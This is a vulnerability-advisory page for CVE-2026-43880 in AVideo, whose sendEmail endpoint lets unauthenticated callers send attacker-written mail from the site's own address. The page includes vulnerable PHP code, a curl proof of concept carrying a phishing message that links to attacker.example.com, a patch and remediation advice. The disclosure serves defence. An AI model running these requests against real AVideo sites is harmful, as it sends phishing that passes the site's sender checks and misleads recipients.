Skip to main content

AVideo CVE-2026-43880

MEDIUM
Improper Verification of Source of a Communication Channel (CWE-940)
2026-05-05 https://github.com/WWBN/AVideo GHSA-5hgj-7gm9-cff5
5.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 22:31 vuln.today
Analysis Generated
May 05, 2026 - 22:31 vuln.today

DescriptionGitHub Advisory

Summary

objects/sendEmail.json.php exposes two branches depending on whether contactForm=1 is submitted. When the parameter is omitted, the endpoint sets $sendTo to an attacker-supplied email and, for unauthenticated callers, uses the site's own contact email as the message From:/Reply-To:. The endpoint is explicitly allow-listed as a "public write action" in objects/functionsSecurity.php (line 885), so it requires no authentication or CSRF token. An unauthenticated attacker (solving a captcha) can force the site's own SMTP infrastructure to send attacker-composed emails to arbitrary recipients with the site's legitimate sender address, passing SPF/DKIM/DMARC for the site's domain - ideal for targeted phishing and brand impersonation.

Details

Vulnerable code (objects/sendEmail.json.php):

php
10: $valid = Captcha::validation(@$_POST['captcha']);
11: if(User::isAdmin()){
12:     $valid = true;
13: }
...
16: if ($valid) {
...
24:     $mail = new \PHPMailer\PHPMailer\PHPMailer();
25:     setSiteSendMessage($mail);           // uses site's SMTP credentials
...
30:     $replyTo = User::getEmail_();
31:     if (empty($replyTo)) {
32:         $replyTo = $config->getContactEmail();   // <-- FALLBACK to site's own email
33:     }
34:
35:     $sendTo = $_POST['email'];            // attacker-controlled recipient
36:
37:     // if it is from contact form send the message to the siteowner and the sender is the email on the form field
38:     if (!empty($_POST['contactForm'])) {
39:         $replyTo = $_POST['email'];
40:         $sendTo  = $config->getContactEmail();
41:     }
42:
43:     if (filter_var($sendTo, FILTER_VALIDATE_EMAIL)) {
44:         $mail->AddReplyTo($replyTo);       // site's address
45:         $mail->setFrom($replyTo);          // From: site's address
...
47:         $mail->addAddress($sendTo);        // TO: attacker-chosen victim
...
49:         $safeFirstName = htmlspecialchars($_POST['first_name'], ENT_QUOTES, 'UTF-8');
50:         $mail->Subject = 'Message From Site ' . $config->getWebSiteTitle() . " ({$safeFirstName})";
51:         $mail->msgHTML($msg);
...
55:         if (!$mail->send()) { ... }

User::getEmail_() (objects/user.php:345-352): returns '' when the caller is not logged in, driving the fallback to $config->getContactEmail().

Endpoint is publicly callable. objects/functionsSecurity.php:879-918 lists sendEmail.json.php in the built-in "public write actions" CSRF/same-domain bypass:

php
static $builtinBypass = [
    ...
    // Public write actions
    'sendEmail.json.php',
    ...
];
if (in_array($baseName, $builtinBypass, true)) { return; }

Why existing defenses don't mitigate the abuse:

  • Captcha (Captcha::validation): costs one solve per email. Manual solves remain viable for targeted phishing, and a separate captcha-bypass primitive in this codebase (tracked separately) automates abuse.
  • FILTER_VALIDATE_EMAIL (line 43): validates $sendTo format, preventing CRLF/header injection, but does not verify that the sender is authorized to send to that address.
  • htmlspecialchars on $safeEmail/$safeComment/$safeFirstName: blocks HTML injection in the rendered message but does not prevent phishing content - attacker fully controls the visible text (URL, instructions) and the perceived sender.
  • No rate limiting, no auth check, no association between the caller and the recipient address.

Flow summary for the abuse case (unauthenticated, no contactForm):

  1. User::getEmail_()'', so $replyTo = site's contact email (line 32)
  2. $sendTo = attacker's chosen recipient (line 35)
  3. contactForm branch skipped (line 38)
  4. Site's SMTP sends From: <site contact> to <victim> with attacker's subject/body (lines 44-51)

Because the message is genuinely relayed by the site's mail infrastructure, SPF/DKIM/DMARC for the site's domain pass, making the phishing message indistinguishable from legitimate site mail.

PoC

Endpoint: POST /objects/sendEmail.json.php (also reachable via POST /sendEmail per .htaccess:201).

bash
# 1. Obtain a session + captcha image
curl -c cookies.txt -s 'http://target.example.com/captcha.php?refresh=1' -o captcha.png
# attacker manually solves the captcha -> e.g. 'abc123'
# 2. Send phishing email. Note: contactForm is OMITTED.
#    - User::getEmail_() returns '' (unauth) -> $replyTo falls back to site's contact email
#    - $sendTo = attacker-chosen recipient
#    - setFrom($replyTo) -> From: is the site's real address
curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \
  --data-urlencode 'captcha=abc123' \
  --data-urlencode 'email=victim@target.com' \
  --data-urlencode 'first_name=Support Team' \
  --data-urlencode 'comment=Urgent: Your account will be suspended. Please verify at http://attacker.example.com/reset'

Expected server response:

json
{"error":"","success":"Message sent"}

Delivered headers at victim@target.com:

From: <site's legitimate contact email, e.g. contact@legit-videosite.com>
Reply-To: <site's legitimate contact email>
To: victim@target.com
Subject: Message From Site <SiteName> (Support Team)
Body:   <b>Email:</b> victim@target.com<br><br>Urgent: Your account will be suspended...

Contrast with the intended contactForm=1 flow (correctly routes to the site owner):

bash
curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \
  --data-urlencode 'captcha=<newcaptcha>' \
  --data-urlencode 'email=attacker@attacker.com' \
  --data-urlencode 'comment=hi' \
  --data-urlencode 'contactForm=1'
# -> $sendTo = site owner's contact email; $replyTo = attacker's email. (Normal contact form.)

Omitting contactForm inverts the routing and turns the endpoint into an unauthenticated sender-for-hire using the site's own From: identity.

Impact

  • Phishing with the site's real sender identity. Mail originates from the site's SMTP, so SPF/DKIM/DMARC pass; the message is indistinguishable from legitimate site communications and bypasses inbox anti-phishing heuristics.
  • Brand impersonation / account-takeover chains. Attacker-controlled subject (first_name) and body (comment) support credential-harvesting pages that appear to come from the site operator.
  • Mail-reputation damage. Repeated abuse can blacklist the site's sending IP/domain, degrading legitimate mail deliverability.
  • Works against any AVideo instance with SMTP configured - a default deployment after the admin configures SMTP for standard notifications. No privileged position, credentials, or non-default flags required.

Recommended Fix

Collapse the endpoint to contact-owner-only behavior and require either authentication or contactForm=1. Minimal patch:

php
// objects/sendEmail.json.php
...
$valid = Captcha::validation(@$_POST['captcha']);
if (User::isAdmin()) {
    $valid = true;
}

// Reject the non-contactForm branch for unauthenticated callers.
// The "share with a friend" flow already requires User::isLogged()
// in the UI (view/.../functiongetShareMenu.php), so enforce it here too.
if (empty($_POST['contactForm']) && !User::isLogged()) {
    $obj = new stdClass();
    $obj->error = __("Authentication required");
    header('Content-Type: application/json');
    echo json_encode($obj);
    exit;
}

$obj = new stdClass();
$obj->error = '';
if ($valid) {
    ...
    $replyTo = User::getEmail_();
    if (empty($replyTo)) {
        // Should no longer be reachable for arbitrary recipients.
        // Keep as defense-in-depth only for contactForm=1 path.
        $replyTo = $config->getContactEmail();
    }
    ...
}

Additional hardening:

  1. Always use a dedicated no-reply@ address in setFrom(); put the caller's address only in Reply-To. Never reuse $config->getContactEmail() as the From for user-initiated messages.
  2. For the logged-in "share" flow, verify the caller's email has been confirmed, and rate-limit by user id and by IP.
  3. Drop the non-contactForm branch entirely if no legitimate unauthenticated UI caller remains.
  4. Add a visible "user-submitted message via our site" banner to the email body so recipients can distinguish these from first-party communications.

AnalysisAI

Unauthenticated arbitrary email sending via sendEmail.json.php allows remote attackers to send phishing emails from the site's legitimate sender address to arbitrary recipients by omitting the contactForm parameter, bypassing authentication and CSRF protections. The endpoint is explicitly allow-listed as a public write action and requires only a solved captcha, enabling an attacker to impersonate the site operator and send messages with forged From/Reply-To headers that pass SPF/DKIM/DMARC validation for the site's domain, ideal for targeted credential harvesting and brand impersonation attacks.

Technical ContextAI

AVideo's sendEmail.json.php endpoint implements two distinct message routing branches controlled by the presence of a contactForm POST parameter. The vulnerable code path occurs when contactForm is omitted: User::getEmail_() returns an empty string for unauthenticated callers, triggering a fallback in line 31-32 that sets $replyTo to $config->getContactEmail() (the site's own contact address). Simultaneously, the attacker-supplied $_POST['email'] is assigned directly to $sendTo without verification of sender authorization. PHPMailer is then configured with $mail->setFrom($replyTo) and $mail->addAddress($sendTo), where $replyTo contains the site's legitimate address and $sendTo contains the attacker's chosen victim. The endpoint is explicitly whitelisted in objects/functionsSecurity.php (lines 879-918) as a built-in public write action, bypassing both CSRF token validation and authentication checks. CWE-940 (Improper Verification of Source of a Communication Channel) manifests as the failure to verify that the caller is authorized to send mail to arbitrary recipients on behalf of the site; the code assumes that controlling the From address implicitly grants mailing privileges to any address.

RemediationAI

Apply the vendor-released patch from commit 4e3709895857a5857f0edb46b0ee984de0d9e1a2, which adds an authentication gate if (empty($_POST['contactForm']) && !User::isLogged()) to reject unauthenticated access to the arbitrary-recipient branch and refactors setFrom() to always use the site's contact email for the non-contactForm path, reserving user-supplied addresses for Reply-To only. Alternatively, as an immediate compensating control, apply network-level access restrictions to block external POST requests to /objects/sendEmail.json.php or /sendEmail via firewall/WAF rules, limiting the endpoint to internal or authenticated subnet access; this mitigates external phishing abuse but does not address internal or compromised-credential scenarios. A more granular compensating control is to configure the SMTP gateway or Mail Transfer Agent (MTA) to strictly enforce DKIM/SPF signing only for a dedicated no-reply@ address and reject outbound mail that attempts to set From to arbitrary administrative addresses, but this requires infrastructure cooperation and does not prevent the vulnerability from being exploited if the attacker controls the allowed sending address. Immediately disable or remove the vulnerable endpoint if the site does not actively use the email-sharing feature (check view/.../functiongetShareMenu.php for UI presence); if sharing functionality is required, restrict it to authenticated users only via the patch. Monitor SMTP logs and mail gateway records for a spike in outbound mail volume, unexpected recipient patterns, or From headers matching the site's contact address with incongruent subject/body content; these are indicators of active exploitation.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-43880 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy